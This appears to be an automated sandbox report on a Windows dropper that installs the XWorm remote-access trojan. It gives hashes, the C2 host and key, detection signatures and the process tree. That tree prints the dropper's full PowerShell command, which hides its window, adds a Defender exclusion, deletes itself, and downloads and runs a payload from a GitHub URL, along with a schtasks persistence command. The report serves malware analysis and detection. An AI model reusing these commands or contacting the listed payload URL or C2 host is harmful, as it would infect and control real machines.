Analysis
-
max time kernel
142s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12/10/2024, 19:06
Static task
static1
Behavioral task
behavioral1
Sample
Bootstrapper.exe
Resource
win7-20241010-en
General
-
Target
Bootstrapper.exe
-
Size
90KB
-
MD5
c25564459238aa1be41f5d9465fe51df
-
SHA1
4751c39b3e98aaaf0c7f3a92172876f1663d5df8
-
SHA256
540e9193d26cbac6c212f3d0d1137b30ce96b93f0d391788f582ae23e682d4bb
-
SHA512
aa97552650f856e53d14622b90dc72087b151b4a81df81785a6d20d7a056992cd1bbdd480da8cde77035b47d739c3289f07433f9a971166f9909a32bb48daabc
-
SSDEEP
1536:j7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfWwJOJ:/7DhdC6kzWypvaQ0FxyNTBfWh
Malware Config
Extracted
https://github.com/cfedss/e/raw/refs/heads/main/PowerShell.exe
Extracted
xworm
5.0
week-dictionary.gl.at.ply.gg:12466
WIHzy7HOqD8TiFlq
-
Install_directory
%AppData%
-
install_file
PowerShell.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000b000000023cb9-33.dat family_xworm behavioral2/memory/2676-42-0x0000000000750000-0x000000000075E000-memory.dmp family_xworm -
Blocklisted process makes network request 2 IoCs
flow pid Process 7 3676 powershell.exe 15 3676 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3676 powershell.exe 3676 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation Discord.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerShell.lnk Discord.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerShell.lnk Discord.exe -
Executes dropped EXE 3 IoCs
pid Process 2676 Discord.exe 1216 PowerShell.exe 876 PowerShell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 12 raw.githubusercontent.com 15 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bootstrapper.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1816 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3676 powershell.exe 3676 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3676 powershell.exe Token: SeDebugPrivilege 2676 Discord.exe Token: SeDebugPrivilege 1216 PowerShell.exe Token: SeDebugPrivilege 876 PowerShell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 4728 wrote to memory of 3648 4728 Bootstrapper.exe 84 PID 4728 wrote to memory of 3648 4728 Bootstrapper.exe 84 PID 3648 wrote to memory of 1380 3648 cmd.exe 86 PID 3648 wrote to memory of 1380 3648 cmd.exe 86 PID 1380 wrote to memory of 1472 1380 net.exe 87 PID 1380 wrote to memory of 1472 1380 net.exe 87 PID 3648 wrote to memory of 3676 3648 cmd.exe 88 PID 3648 wrote to memory of 3676 3648 cmd.exe 88 PID 3676 wrote to memory of 4660 3676 powershell.exe 90 PID 3676 wrote to memory of 4660 3676 powershell.exe 90 PID 4660 wrote to memory of 728 4660 csc.exe 92 PID 4660 wrote to memory of 728 4660 csc.exe 92 PID 3676 wrote to memory of 2676 3676 powershell.exe 93 PID 3676 wrote to memory of 2676 3676 powershell.exe 93 PID 2676 wrote to memory of 1816 2676 Discord.exe 94 PID 2676 wrote to memory of 1816 2676 Discord.exe 94 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B92E.tmp\B92F.tmp\B930.bat C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:1472
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -Name Window -Namespace Console -MemberDefinition '[DllImport(\"Kernel32.dll\")] public static extern IntPtr GetConsoleWindow(); [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);';" "$consolePtr = [Console.Window]::GetConsoleWindow();" "[Console.Window]::ShowWindow($consolePtr, 0);" "Add-MpPreference -ExclusionPath $env:USERPROFILE;" "Remove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force;" "$url = 'https://github.com/cfedss/e/raw/refs/heads/main/PowerShell.exe';" "$outputFile = [System.IO.Path]::Combine($env:Temp, 'Discord.exe');" "Start-Sleep -Milliseconds 100;" "Invoke-WebRequest -Uri $url -OutFile $outputFile;" "Start-Process -FilePath $outputFile"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ceu1gz3v\ceu1gz3v.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE10.tmp" "c:\Users\Admin\AppData\Local\Temp\ceu1gz3v\CSCC651F293A49D4066BA7AF197A3769672.TMP"5⤵PID:728
-
-
-
C:\Users\Admin\AppData\Local\Temp\Discord.exe"C:\Users\Admin\AppData\Local\Temp\Discord.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PowerShell" /tr "C:\Users\Admin\AppData\Roaming\PowerShell.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:1816
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\PowerShell.exeC:\Users\Admin\AppData\Roaming\PowerShell.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
C:\Users\Admin\AppData\Roaming\PowerShell.exeC:\Users\Admin\AppData\Roaming\PowerShell.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:876
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD527bec467d9d4ef4088762686a26ca1b5
SHA182e570d313bb36fa7d41c11c2305812235135f1e
SHA256f23cd13bf7fcafcc6a24776dc2c493ceb025d96287e35f409a40d29db8783de3
SHA512fd9153ab272412a2ac9cab520fea3400dbc7828458719bd9c101af142cd06605ac3c8120fe63ff2941777ae09803c54e7b537b0c6a7f814aa9da9a11d632f0e7
-
Filesize
34KB
MD5df4465e6693e489c6db32a427bbd93ec
SHA1ea8ef0ae2b517e10f934b66ebefa71e2d9007aa5
SHA2560c5031bae18c7e5b294b89b4b82e30c3862d1e5e4aa5fd664d7a04451dc83847
SHA5124d569c1c29adadf32ff28ba53378493189c99e6e1734e1c896e52e6df89358cbfc6525a96ae1d5cbd99a909ffb7d8e88b075674f679a448a54fef961cdc16f5d
-
Filesize
1KB
MD5f5a9518176ac8a86c05019fcf60d5d53
SHA138a4693af9a3f1bd10c7baf2ad07af6e7ccbf3f3
SHA2563581724ec09ad21759b311bfdaed7f1410e42dc1c4566dafa53de990d3a45e56
SHA512c1fa956938030b44c7a594358de9db0cb79c027e8d39361b2c75c905916ab312515841310315fdfa96eeddf19d09d606414f03ab22703061ba71c4acf1cadd05
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5310e8d9f4a3c7052b81c551bc680793d
SHA1a9efb8913f125a0e495fa8e57b4dae156442bdb2
SHA256f4fd9f82c068708a2d0d2ff50d18f3e66428a86685f6d4d81a7f655c7a4c6045
SHA5125416e95c917fa09af188e4d319316d6155be6967007412db7744d6519ed3188392e06357417afdd41ef117d4f53175dac82710c6ec75a27cf61bece35516b597
-
Filesize
652B
MD53de3d73949f7ad947aec6b91b3df0d5f
SHA153f8fb3f5c328d652f04880b848bfc4f134a8374
SHA2567d1466cf233923fa9139d64f47eac52849eb0bf4cbc6b4313110d6e9ebbd0103
SHA5120e2ea46e68ca97873d7853b17d4a933d7d143f1eea7db6a8a55e4f1a4856a97fcc595f1535f801231ed944bec585a0f3301f639f682cc6a78d3b99318b2250ff
-
Filesize
289B
MD5c617d0acde7fbd9a849fd6cde234d1f2
SHA194d3c83ad8cdd8abc267da0da4a24b9a43edda45
SHA256e7fe5306977c98a8edaeeee034073c892dcaa742f20717f5398daf536057be35
SHA512d1f74f623a7103137bd8c71c5d15a69afd1b88338f95c2e1cc80f874c2db47c593619fd9964e08e76386d3207f0a688fbea4eeb96e71f8d7d469d6f4d47aeb4e
-
Filesize
369B
MD5760ab55ab558e4bc47492562c6ed3d45
SHA1818cff27735c38c729b549c260ac2b667ef3f5f0
SHA256be58c2d0563d676e7276166e0d446b35f93c915f705b154852067a2b1d93b193
SHA5120bc1e044d2efde83b1841903c4457d0b6b9b9b4aa8755675b5fc55ab301a1b2594ad899a9efff3730980ddd9f06843ef91864892660a2bbab599acfbe77ba3c2